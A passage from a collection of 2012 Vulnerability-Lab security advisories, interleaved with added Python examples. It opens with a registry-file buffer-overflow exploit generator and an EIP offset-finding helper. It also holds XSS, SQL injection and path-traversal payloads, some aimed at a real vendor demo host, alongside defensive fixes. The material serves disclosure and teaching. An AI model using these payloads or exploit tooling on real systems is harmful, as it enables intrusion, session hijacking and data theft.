# The TempFolder value is read by pdmlog.dll at application start, which is
# where the overflow happens.
poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + "[HKEY_CURRENT_USER\\Software\\Socusoft Photo to Video Converter Free Version\\General]\n"
poc = poc + "\"TempFolder\"=\"" + junk1 + boom + junk2 + "\""

try:
    print("[*] Creating exploit file...\n")
    writeFile = open(file, "w")
    writeFile.write(poc)
    writeFile.close()
    print("[*] File successfully created!")
except:
    print("[!] Error while creating file!")

Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(-).

Credits:
========
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]
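The Pitrinec options.ini and the Socusoft TempFolder proofs of concept above use the same 548 x 'A', 4 x 'B', 100 x 'C' layout, which only confirms an offset that is already known. A cyclic pattern turns the first crash into the offset: every 4-byte window of the pattern is unique, so the value that lands in the faulting register (EIP in the Socusoft crash, ECX in the Pitrinec one) is looked up in the pattern. The following is an added example, not code from either advisory. It reuses the registry key and value name from the Socusoft PoC and the Metasploit pattern_create/pattern_offset scheme; the 652-byte length is simply the PoC's total, and the second-stage helper assumes, as the PoC does, that the four bytes after the filler are what ends up in EIP.

```python
import string
import struct

# Registry location from the Socusoft PoC; the payload is written into TempFolder.
REG_KEY = r"HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General"
REG_VALUE = "TempFolder"


def cyclic_pattern(length):
    """Metasploit-style pattern "Aa0Aa1Aa2...": groups of upper, lower, digit,
    so every 4-byte window is unique within the first 20280 bytes."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern of %d bytes would repeat" % length)
    groups = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                groups.append(u + l + d)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def register_value_at(pattern, offset):
    """The 32-bit value a register holds when the four pattern bytes at
    `offset` are loaded into it (x86 is little-endian)."""
    return struct.unpack("<I", pattern[offset:offset + 4].encode("latin-1"))[0]


def pattern_offset(pattern, reg_value):
    """Map a faulting register value (EIP here, ECX in the Pitrinec crash) back
    to the offset of those bytes in the pattern."""
    needle = struct.pack("<I", reg_value).decode("latin-1")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("0x%08x is not a window of this pattern; was the crash "
                         "produced with a plain 'AAAA...' buffer instead?" % reg_value)
    return idx


def build_reg_file(payload):
    """Same .reg layout the PoC writes, with `payload` as the TempFolder string.
    Double quotes, backslashes and control characters would be consumed by the
    .reg parser instead of reaching the application, so refuse them."""
    if any(c in '"\\' or ord(c) < 0x20 for c in payload):
        raise ValueError("payload contains bytes the .reg format cannot carry raw")
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[%s]\r\n\"%s\"=\"%s\"\r\n" % (REG_KEY, REG_VALUE, payload))


def eip_overwrite(offset, eip, tail=100):
    """Second stage once the offset is known: filler up to the saved return
    address, the 4 bytes that land in EIP, then a tail (the PoC's junk2)."""
    return "A" * offset + struct.pack("<I", eip).decode("latin-1") + "C" * tail


if __name__ == "__main__":
    # Stage 1: import a .reg carrying the pattern, start the application,
    # read EIP from the debugger.
    pattern = cyclic_pattern(652)          # 548 + 4 + 100, the PoC's total length
    with open("poc.reg", "w") as fh:
        fh.write(build_reg_file(pattern))
    # Stage 2 (simulated here): a crash at the PoC's offset would report this EIP.
    eip = register_value_at(pattern, 548)
    print("EIP 0x%08X -> offset %d" % (eip, pattern_offset(pattern, eip)))
```

The .reg file is written as ANSI text, as the PoC's was, so a real return address has to survive the system code page as well as the application's own string handling; 0x42424242 is conveniently plain ASCII, and the build_reg_file check only rejects the bytes the .reg format itself cannot carry. Feeding a value such as the 0x42424242 from the original crash to pattern_offset raises rather than guessing, because "BBBB" is not a window of the pattern.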
[Full-disclosure] OSQA CMS v3b - Multiple Persistent Vulnerabilities
Title:
OSQA CMS v3b - Multiple Web Vulnerabilities

Date:
2012-02-27

References:
http://www.vulnerability-lab.com/get_content.php?id=461

VL-ID:
461

Introduction:
OSQA is the Open Source QA System. It is free software licensed under the GPL, and you can download the source code for OSQA from our Subversion server. OSQA is originally based on CNProg, an excellent Chinese QA web application written by Mike Chen and Sailing Cai. OSQA is written in Python and powered by the Django application framework.

Abstract:
The Vulnerability Lab Research Team discovered multiple persistent input validation vulnerabilities in OSQA CMS v3b.

Report-Timeline:
2012-02-27: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent cross site scripting vulnerabilities are detected in OSQA CMS v3b. They allow remote attackers (with high required user interaction) or local low-privileged user accounts (with medium required user interaction) to hijack customer, moderator or admin sessions. Successful exploitation can result in account theft, phishing and application-side manipulation of requested content. Because the injection is persistent, the payload entered through the question editor is stored and executes for every user who later views the question.

Vulnerable Module(s):
[+] Url Bar
[+] Picture Bar
[+] Blockquote

Proof of Concept:
The vulnerabilities can be exploited by local low-privileged user accounts or by remote attackers with high required user interaction. For demonstration or reproduction ...

XSS #1
1. Open http://localhost/questions/ask/
2. Click the url bar control
3. Enter the XSS code: img src=img src=search/onerror=alert(xss)//

XSS #2
1. Open http://localhost/questions/ask/
2. Click the picture bar control
3. Enter the XSS code: img src=img src=search/onerror=alert(xss)//

Risk:
The security risk of the cross site scripting vulnerabilities is estimated as medium(-).

Credits:
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)

Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
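As an added example (Python, not OSQA's own code), the following shows the pattern behind the url bar / picture bar findings: a markdown image whose URL is dropped into an <img> tag verbatim lets a double quote in the URL close the src attribute and start an onerror handler. The unsafe renderer is the vulnerable shape; the safe one restricts the URL scheme and HTML-escapes every attribute value. The regex, the scheme list and the sample payload are assumptions for the demonstration.

```python
#!/usr/bin/env python3
"""Added example: attribute breakout in a markdown image renderer, and the
hardened version. Not OSQA code."""
import html
import re
from urllib.parse import urlsplit

# ![alt](url) with no whitespace or ')' inside the URL (assumed grammar).
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")
# "" keeps relative links such as search/ working; javascript:, data: etc. are refused.
SAFE_SCHEMES = {"http", "https", ""}


def render_unsafe(text):
    """Vulnerable: user-controlled alt and url go straight into attributes."""
    return IMAGE_RE.sub(
        lambda m: '<img src="%s" alt="%s">' % (m.group(2), m.group(1)), text)


def render_safe(text):
    """Hardened: validate the scheme, then escape so the payload stays text."""
    def sub(m):
        alt, url = m.group(1), m.group(2)
        if urlsplit(url).scheme.lower() not in SAFE_SCHEMES:
            return html.escape(m.group(0))        # leave the markdown inert
        return '<img src="%s" alt="%s">' % (
            html.escape(url, quote=True), html.escape(alt, quote=True))
    return IMAGE_RE.sub(sub, text)


# Constructed payload: a "URL" that closes src and adds an event handler.
DEMO_PAYLOAD = '![x](search/"onerror="alert`1`)'

if __name__ == "__main__":
    print(render_unsafe(DEMO_PAYLOAD))   # attribute breakout: onerror="alert`1`"
    print(render_safe(DEMO_PAYLOAD))     # quotes become &quot;, no handler
```

Escaping on output is what makes the stored payload harmless; stripping a blocklist of tags at input time is the approach that keeps producing bypasses like the one reported here.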
[Full-disclosure] Wolf CMS v0.7.5 - Multiple Web Vulnerabilities
Title:
Wolf CMS v0.7.5 - Multiple Web Vulnerabilities

Date:
2012-02-27

References:
http://www.vulnerability-lab.com/get_content.php?id=452

VL-ID:
452

Introduction:
Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS. The project was a finalist in the 2010 Packt Publishing Open Source Awards in the Most Promising Open Source Project category. As of the 28th of December 2010, the Wolf CMS code repository was moved from Google Code to Github.
( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS )

Abstract:
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Wolf Content Management System v0.7.5.

Report-Timeline:
2012-02-11: Vendor Notification
2012-02-27: Public or Non-Public Disclosure

Status:
Published

Affected Products:
BlueWin CH
Product: Wolf CMS v0.7.5

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
A SQL injection vulnerability is detected in the Wolf Content Management System v0.7.5. It allows a remote attacker to execute their own SQL commands against the application's DBMS. Successful exploitation can result in compromise of the DBMS, web server or application.

Vulnerable Module(s):
[+] /plugins/comment/[Index]

Picture(s):
../1.png

1.2
Multiple persistent vulnerabilities are detected in the Wolf Content Management System v0.7.5. The bug allows a remote attacker or a local low-privileged user account to inject persistent malicious script code on the application side. Successful exploitation can result in persistent manipulation of request context, session hijacking and account theft via application-side phishing.

Vulnerable Module(s):
[+] /plugins/comment/

Picture(s):
../2.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers or local low-privileged user accounts, with and without required user interaction. For demonstration or reproduction ...

1.1
Path: /wolfcms/wolf/plugins/comment/
File: index.php
Review:
271: $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : ($_SERVER['REMOTE_ADDR']);

1.2
Path: /wolfcms/wolf/plugins/comment/
File: index.php
Review: /wolfcms/wolf/plugins/comment/index.php
272: echo '<input type="hidden" value="'.$ip.'" name="comment[author_ip]" />';

Both findings share one root cause. The X-Forwarded-For request header is supplied by the client, and line 271 copies it into $ip without checking that it is an IP address at all. Line 272 then echoes $ip unescaped into the page (1.2), and the same string is what the comment plugin goes on to use as the comment's author_ip (1.1). Note also that a hidden form field is client-controlled: whatever the server puts into comment[author_ip] comes back from the browser under the attacker's control, so the address has to be recomputed and validated on submission rather than trusted from the form.

Risk:
1.1 The security risk of the blind SQL injection vulnerability is estimated as high(+).
1.2 The security risk of the persistent XSS vulnerabilities is estimated as medium(+).

Credits:
Vulnerability Research Laboratory - Ucha Gobejishvili M. (longrifle0x)
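As an added example (Python rather than the plugin's PHP, and not Wolf CMS code), this is the logic line 271 needed: the header is honoured only when the TCP peer is a known reverse proxy, each hop is parsed with the ipaddress module so that SQL or HTML fragments can never become "the client IP", and the value is escaped before it is echoed the way line 272 does. The TRUSTED_PROXIES set and the sample $_SERVER dictionaries are assumptions for the demonstration.

```python
#!/usr/bin/env python3
"""Added example: validated client-IP extraction and escaped output, the fix
for the $ip handling in the Wolf CMS comment plugin. Not Wolf CMS code."""
import html
import ipaddress

# Assumed reverse-proxy addresses; a real deployment reads these from config.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.1")}


def client_ip(env, trusted_proxies=TRUSTED_PROXIES):
    """env mirrors PHP's $_SERVER. Always returns a syntactically valid address."""
    remote = ipaddress.ip_address(env["REMOTE_ADDR"])   # set by the socket, not the client
    if remote not in trusted_proxies:
        return str(remote)        # direct connection: the header is attacker-controlled

    xff = env.get("HTTP_X_FORWARDED_FOR", "")
    # Header form is "client, proxy1, proxy2". Only the entries appended by our
    # own proxies are trustworthy, so walk from the right and stop at the first
    # hop that is not one of them.
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                 # "1' OR 1=1--", '"><script>', ...: not an address
        if addr not in trusted_proxies:
            return str(addr)
    return str(remote)            # nothing usable in the header


def hidden_ip_field(ip):
    """Line 272 echoes $ip raw; escaping makes a stray quote or '<' inert."""
    return '<input type="hidden" value="%s" name="comment[author_ip]" />' % html.escape(ip, quote=True)


if __name__ == "__main__":
    # Constructed requests: one direct, one via the proxy, one with a hostile header.
    print(client_ip({"REMOTE_ADDR": "203.0.113.5", "HTTP_X_FORWARDED_FOR": "1.1.1.1"}))
    print(client_ip({"REMOTE_ADDR": "10.0.0.1", "HTTP_X_FORWARDED_FOR": "198.51.100.7, 10.0.0.1"}))
    print(client_ip({"REMOTE_ADDR": "10.0.0.1", "HTTP_X_FORWARDED_FOR": "1' OR 1=1-- "}))
    print(hidden_ip_field('"><script>'))
```

Even with a validated address, the database write should use a prepared statement; validation here removes the injection vector, it does not replace parameterisation.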
[Full-disclosure] Endian UTM Firewall v2.4.x - Cross Site Vulnerabilities
Title:
Endian UTM Firewall v2.4.x - Cross Site Vulnerabilities

Date:
2012-02-18

References:
http://www.vulnerability-lab.com/get_content.php?id=436

VL-ID:
436

Introduction:
The Endian Firewall is an open source GNU/Linux distribution that specializes in routing/firewalling and Unified Threat Management. It is being developed by the Italian Endian Srl and the community. Endian is originally based on IPCop, which itself was a fork of Smoothwall.
(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Endian_Firewall )

Simple, fast and future-proof! The ideal solution for protecting your branch offices and industrial sites around the globe. Endian 4i is the ideal solution for branch offices or industrial installations. The firewall is available in two variants, "Office" and "Industrial". The Office version offers every function needed to link networks within the company, and with remote sites, simply and securely. The Industrial version has the same feature set, is aimed specifically at industrial environments, supports 24V power and can be mounted on a DIN rail. Remote support, remote configuration and system monitoring, all the way to simple, secure networking of remote sites: the cost advantages are obvious. Secure your company's connectivity and stay ahead with the Endian 4i.
(Copy of the Vendor Homepage: http://www.endian.com/de/products/utm-hardware/4i/)

Abstract:
The Vulnerability Lab Team discovered multiple non-persistent cross site scripting vulnerabilities in the Endian UTM Firewall v2.4.x application.

Report-Timeline:
2011-02-02: Vendor Notification
2012-02-18: Public or Non-Public Disclosure

Status:
Published

Affected Products:
Endian
Product: UTM Firewall Appliance Application v2.4.x

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple non-persistent cross site scripting vulnerabilities are detected in the Endian Firewall v2.4.x UTM appliance application. They allow remote attackers (with high required user interaction) or local low-privileged user accounts to hijack customer, moderator or admin sessions. Successful exploitation can result in account theft, phishing and client-side manipulation of requested content. The affected CGIs belong to the appliance's administration interface, so a reflected payload that a logged-in administrator is lured into opening runs inside the firewall's own management session.

Vulnerable Module(s):
[+] openvpn_users.cgi
[+] dnat.cgi#createrule
[+] dansguardian.cgi#addrule

Picture(s):
../1.png
../2.png
../3.png

Proof of Concept:
The vulnerabilities can be exploited by local low-privileged user accounts or by remote attackers with high required user interaction. For demonstration or reproduction ...

#1 https://demo.endian.com/cgi-bin/dnat.cgi#createrule [XSS]
#2 https://demo.endian.com/cgi-bin/dansguardian.cgi#addrule [XSS]
#3 https://demo.endian.com/cgi-bin/openvpn_users.cgi ?=[XSS]

Risk:
The security risk of the cross site scripting vulnerabilities is estimated as medium(-).

Credits:
Vulnerability Research Laboratory
[Full-disclosure] Pandora FMS v4.0.1 - Local File Include Vulnerability
Title:
Pandora FMS v4.0.1 - Local File Include Vulnerability

Date:
2012-02-17

References:
http://www.vulnerability-lab.com/get_content.php?id=435

VL-ID:
435

Introduction:
Pandora FMS is open source monitoring software. It watches your systems and applications, and lets you know the status of any element of those systems. Pandora FMS can detect a network interface going down, a defacement of your website, a memory leak in one of your server applications, or the movement of any value on the NASDAQ new technology market.
* Detect new systems in the network.
* Checks for availability or performance.
* Raise alerts when something goes wrong.
* Get data from inside systems with its own lightweight agents (for almost every operating system).
* Get data from outside, using only network probes, including SNMP.
* Receive SNMP traps from generic network devices.
* Generate real-time reports and graphics.
* SLA reporting.
* User-defined graphical views.
* Store data for months, ready to be used in reporting.
* Real-time graphs for every module.
* High availability for each component.
* Scalable and modular architecture.
* Supports up to 2500 modules per server.
* User-defined alerts, which can also be used to react to incidents.
* Integrated incident manager.
* Integrated DB management: purge and DB compaction.
* Multi-user, multi-profile, multi-group.
* Event system with user validation for operation in teams.
* Granular access and user profiles for each group and each user.
* Profiles can be personalized using up to eight security attributes without limitation on groups or profiles.
Pandora FMS runs on any operating system, with specific agents for each platform gathering data and sending it to a server; it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.
(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)

Abstract:
The Vulnerability-Lab Team discovered a file include vulnerability in the Pandora FMS Monitoring application v4.0.1.

Report-Timeline:
2012-02-01: Vendor Notification
2012-02-17: Public or Non-Public Disclosure

Status:
Published

Affected Products:
Pandora FMS
Product: Pandora FMS Monitoring v4.0.1

Exploitation-Technique:
Local

Severity:
High

Details:
A local file include vulnerability is detected in the Pandora FMS Monitoring application v4.0.1. It allows an attacker to request local system or application files (example: module) through the sec2 parameter, which selects the page to include. Successful exploitation can result in compromise of the DBMS or of the service/appliance/application via the file include.

Vulnerable Module(s):
[+] ?sec=services&sec2=

Affected Version(s):
[+] Pandora FMS Monitoring v4.0.1

Picture(s):
../1.png
../2.png

Proof of Concept:
The vulnerability can be exploited by a remote attacker with a privileged user account. For demonstration or reproduction ...

http://[SERVER].[COM]/[PANDORA PATH]/[INDEX].[PHP]?sec=services&sec2=[FILE INCLUDE VULNERABILITY!]

Risk:
The security risk of the local path include vulnerability is estimated as high(-).

Credits:
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)

--- + VIDEO ;)

Title:
Pandora FMS Monitoring - File Include Vulnerability VD

Date:
2012-02-17

References:
Download: http://www.vulnerability-lab.com/resources/videos/438.wmv
View:
[Full-disclosure] Facebook NYClubs - Multiple Web Vulnerabilities
Title:
Facebook NYClubs - Multiple Web Vulnerabilities

Date:
2012-02-17

References:
http://www.vulnerability-lab.com/get_content.php?id=440

VL-ID:
440

Introduction:
The application is currently included and viewable by all Facebook users. The service is an external 3rd party application sponsored by the Facebook NYClubs Development Team.
(Copy from the Vendor's Homepage: http://apps.facebook.com/nyclubs/)

Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics.
(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook)

Abstract:
A Vulnerability-Lab researcher discovered multiple web vulnerabilities in the 3rd party web application Facebook NYClubs (apps.facebook.com).

Report-Timeline:
2012-02-15: Vendor Notification
2012-02-16: Vendor Response/Feedback
2012-02-16: Developer Notification by Facebook Security
2012-02-17: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
A remote SQL injection vulnerability is detected in the Facebook NYClubs application (apps.facebook). It allows a remote attacker to inject and execute their own SQL statements against the affected application's DBMS. Successful exploitation can result in a stable compromise of the application, service or DBMS. The application also returns the failed INSERT statement, submitted values included, to the client; that error message is what reveals the reviews table's column list below.

Vulnerable Application(s):
[+] NYClubs - Facebook 3rd Party Application

Vulnerable Module(s):
[+] Messagebox

Affected Service(s):
[+] apps.facebook.com/nyclubs/

--- Exception/Error Logs ---
INSERT INTO reviews (club_id, ip, name, fbid, location, email, rating, content, active, approved) VALUES (652,`121.112.203.222 ` Sven R-m,11940496405,`x014...@gmail.com`,10,`` i-(Rated 9/10)

Picture(s):
../1.png

1.2
A client-side cross site scripting vulnerability is detected in the Facebook NYClubs application (apps.facebook). It allows a remote attacker to hijack sessions and manipulate client-side application requests, with high required user interaction.

Vulnerable Module(s):
[+] ?r=sregion&d=

Picture(s):
../2.png

Proof of Concept:
The vulnerabilities can be exploited with and without high required user interaction. For demonstration or reproduction ...

1.1
Vulnerable: [MessageBox Input]
Include a frame to the local app website and extract the error log.
Columns: club_id, ip, name, fbid, location, email, rating, content, active, approved
IP: 121.112.203.222
NAME: Sven R-m
Mail: x014...@gmail.com
Limit: 10--
Type: Order by Injection
Reference(s): ../652.htm

1.2
http://apps.facebook.com/nyclubs/?r=sregion&d=%3Ciframe%20src=http://vulnerability-lab.com%20width=750%20height=700%3E
Reference(s): ../NYClubs on Facebook.htm

Risk:
The security risk of the application SQL injection vulnerability is estimated as high(+).

Credits:
Vulnerability Research Laboratory - N/A Anonymous
[Full-disclosure] Yahoo! Messenger v11.5 - Buffer Overflow Vulnerability
Title:
Yahoo! Messenger v11.5 - Buffer Overflow Vulnerability

Date:
2012-02-11

References:
http://www.vulnerability-lab.com/get_content.php?id=434

VL-ID:
434

Introduction:
Yahoo Messenger (written Yahoo! Messenger, also Y!M, YIM or Yim for short) is a widely used instant messaging client and a protocol from Yahoo. Yahoo Messenger is free and can be downloaded and installed with a valid Yahoo account. The functions of Yahoo Messenger are very similar to those of ICQ, AOL Instant Messenger and Windows Live Messenger, but they are not compatible with each other. However, Microsoft and Yahoo have decided to join their IM services: since version 8 of Yahoo Messenger, at least text messages can be exchanged with Windows Live Messenger.
(Copy of the Vendor Homepage: http://de.wikipedia.org/wiki/Yahoo_Messenger )

Abstract:
The Vulnerability Lab Research Team discovered a buffer overflow vulnerability in Yahoo Messenger v11.5.

Report-Timeline:
2012-02-10: Public or Non-Public Disclosure

Status:
Published

Affected Products:
Yahoo!
Product: Instant Messenger v11.5

Exploitation-Technique:
Local

Severity:
High

Details:
A buffer overflow vulnerability is detected in the Yahoo Messenger v11.5 client software. The bug is located in the drag & drop message box function of the software when processing specially crafted file transfers. The vulnerability allows a local attacker to reliably crash the software and all Yahoo components bound to it. The advisory demonstrates a crash; no evidence of control over the overwritten memory is given.

Vulnerable Module(s):
[+] Drag & Drop - Message Box

Picture(s):
../1.png
../2.png

Proof of Concept:
This vulnerability can be exploited by local attackers. For demonstration or reproduction ...

PoC Video: http://www.vulnerability-lab.com/get_content.php?id=432

Risk:
The security risk of the local vulnerability is estimated as high(-).

Credits:
Vulnerability Research Laboratory - Manideep a.k.a z3r0 erRoR
[Full-disclosure] eFront Community++ v3.6.10 - SQL Injection Vulnerability
Title:
eFront Community++ v3.6.10 - SQL Injection Vulnerability

Date:
2012-02-11

References:
http://www.vulnerability-lab.com/get_content.php?id=422

VL-ID:
422

Introduction:
Tailored with larger organizations in mind, eFront Community++ offers solutions for the management of a company's most valued asset: its people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Community++ platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Community++ builds on top of eFront Educational.
(Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-Community ++.html)

Abstract:
A Vulnerability Lab researcher discovered a SQL injection vulnerability in the eFront Community++ v3.6.10 application.

Report-Timeline:
2012-02-01: Vendor Notification
2012-02-11: Public or Non-Public Disclosure

Status:
Published

Affected Products:
eFront
Product: Community++ v3.6.10

Exploitation-Technique:
Remote

Severity:
High

Details:
A remote SQL injection vulnerability is detected in the eFront Community++ v3.6.10 application. It allows a remote attacker to inject and execute their own SQL commands against the affected eFront application's DBMS. The vulnerable parameter (edit_course) is a numeric course identifier in the administrator interface, so a single quote in the value breaks out of the query. Successful exploitation by a privileged user account can result in compromise of the DBMS and application.

Vulnerable Module(s):
[+] Course Edit

Picture(s):
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduction ...

PoC: [server].com/communityplusplus/www/administrator.php?ctg=course&edit_course=-1'[SQL INJECTION!]

Reference(s): [Server].[COM]/[CMS PATH]/[WWW]/[File].[PHP]?[Value]=[Value2]&[EDIT]=[SQL INJECTION!]

Risk:
The security risk of the SQL injection vulnerability is estimated as high(+).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
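As an added example covering both the NYClubs reviews INSERT above (VL-ID 440) and the eFront edit_course lookup (VL-ID 422), the following Python/sqlite3 code builds each query the injectable way, by string formatting, and then the parameterised way. The table layouts reuse the column names from the NYClubs error log; the course table, its rows and the payloads are constructed for the demonstration and are not from either application.

```python
#!/usr/bin/env python3
"""Added example: string-built SQL versus parameterised SQL for the two
injection points in the NYClubs and eFront advisories. Not their code."""
import sqlite3


def fresh_db():
    db = sqlite3.connect(":memory:")
    # Column list from the NYClubs error log; the types are assumed.
    db.execute("""CREATE TABLE reviews (id INTEGER PRIMARY KEY, club_id INTEGER,
                  ip TEXT, name TEXT, fbid TEXT, location TEXT, email TEXT,
                  rating INTEGER, content TEXT, active INTEGER, approved INTEGER)""")
    # Constructed stand-in for eFront's course table.
    db.execute("CREATE TABLE courses (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO courses VALUES (1, 'intro'), (2, 'advanced')")
    return db


def insert_review_unsafe(db, name, content):
    """Vulnerable: a quote in `name` ends the literal and the rest is SQL.
    Returns the DBMS error text (what NYClubs echoed to the client) or None."""
    sql = ("INSERT INTO reviews (club_id, name, content, active, approved) "
           "VALUES (652, '%s', '%s', 1, 0)" % (name, content))
    try:
        db.execute(sql)
        return None
    except sqlite3.Error as e:
        return str(e)


def insert_review_safe(db, name, content):
    """Parameterised: the driver sends the values separately from the SQL text."""
    db.execute("INSERT INTO reviews (club_id, name, content, active, approved) "
               "VALUES (652, ?, ?, 1, 0)", (name, content))


def review_rows(db):
    return db.execute("SELECT name, content, approved FROM reviews ORDER BY id").fetchall()


def course_unsafe(db, edit_course):
    """administrator.php?ctg=course&edit_course=-1' ... style lookup."""
    return db.execute("SELECT name FROM courses WHERE id = '%s'" % edit_course).fetchall()


def course_safe(db, edit_course):
    """An id is numeric: reject anything else before it reaches the query."""
    try:
        course_id = int(edit_course)
    except ValueError:
        return []
    return db.execute("SELECT name FROM courses WHERE id = ?", (course_id,)).fetchall()


if __name__ == "__main__":
    db = fresh_db()
    # Constructed payload: closes the name literal, sets approved=1, comments out the rest.
    payload = "x', 'pwned', 1, 1) -- "
    print(insert_review_unsafe(db, payload, "whatever"), review_rows(db))
    print(course_unsafe(db, "-1' OR '1'='1"))      # every course
    print(course_safe(db, "-1' OR '1'='1"))        # nothing
```

The unsafe insert does not even error on this payload: it stores a pre-approved review. Only malformed payloads produce the error message the advisory captured, which is why leaking DBMS errors to the client turns a blind injection into a guided one.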
[Full-disclosure] Yahoo Messenger - Buffer Overflow Vulnerability [Video]
Title:
Yahoo Messenger - Buffer Overflow Vulnerability [Video]

Date:
2012-02-10

References:
Download: http://www.vulnerability-lab.com/resources/videos/432.wmv
View: http://www.youtube.com/watch?v=cc9qc90Rz64

VL-ID:
432

Status:
Published

Exploitation-Technique:
Defensive

Severity:
High

Details:
The video shows a live demonstration session by Manideep alias z3r0 erRoR on the famous Yahoo Messenger. The video explains how to detect and exploit a local drag & drop buffer overflow vulnerability.
1) Whenever we try to send an image file in the IM box of a chat room, it gets delivered as a file to the other person.
2) Yahoo Messenger does not allow dragging and dropping files onto its chat room message box.
3) However, we can copy and paste it there, resulting in a Yahoo Messenger crash!

Credits:
Vulnerability Research Laboratory - Manideep a.k.a z3r0 erRoR
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities
Title:
Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities

Date:
2012-02-07

References:
http://www.vulnerability-lab.com/get_content.php?id=428

VL-ID:
428

Introduction:
Dolibarr ERP CRM is modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It is open source free software designed for small and medium companies, foundations and freelancers. You can install, use and distribute it as a standalone application or as a web application (on a shared or dedicated server, or on SaaS or cloud solutions) and use it with any device (desktop, smartphone, tablet).
(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
A Vulnerability-Lab researcher discovered multiple file include vulnerabilities in Dolibarr CMS v3.2.0 Alpha.

Report-Timeline:
2011-02-08: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Critical

Details:
Multiple file include vulnerabilities are detected in the Dolibarr Content Management System v3.2.0 Alpha. They allow a remote attacker or a local low-privileged user account to request local web server or system files: the file parameter of document.php and the backtopage parameter of comm/action/fiche.php accept ../ sequences, so the path can be walked out of the intended directory. Successful exploitation results in compromise of the DBMS and application.

Vulnerable Module(s):
[+] ?modulepart=project&file=
[+] ?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=

Picture(s):
../1.png
../2.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers or local low-privileged user accounts. For demonstration or reproduction ...

http://xxx.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!]
http://xxx.com/comm/action/fiche.php?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=../common/[FILE INCLUDE VULNERABILITY!]

Risk:
The security risk of the file include vulnerabilities is estimated as high(+).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri & Ucha Gobejishvili (longrifle0x)
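As an added example covering both the Pandora FMS sec2 include (VL-ID 435) and the Dolibarr file/backtopage parameters (VL-ID 428), the following Python code shows the two defences that close this class of bug: a page selector is mapped through a fixed allow-list instead of being turned into a path, and a file-download parameter is joined, canonicalised and then checked to still lie inside the module directory. The ALLOWED_SECTIONS map, the base directory and the sample parameter values are assumptions for the demonstration; none of this is Pandora FMS or Dolibarr code.

```python
#!/usr/bin/env python3
"""Added example: allow-listed page includes and contained file paths, the
fixes for the LFI parameters in the Pandora FMS and Dolibarr advisories."""
import os

# Assumed section -> pages map; a real application enumerates its own modules.
ALLOWED_SECTIONS = {"services": {"list", "edit"}}


def resolve_section(sec, sec2):
    """index.php?sec=...&sec2=...: never build an include path from the
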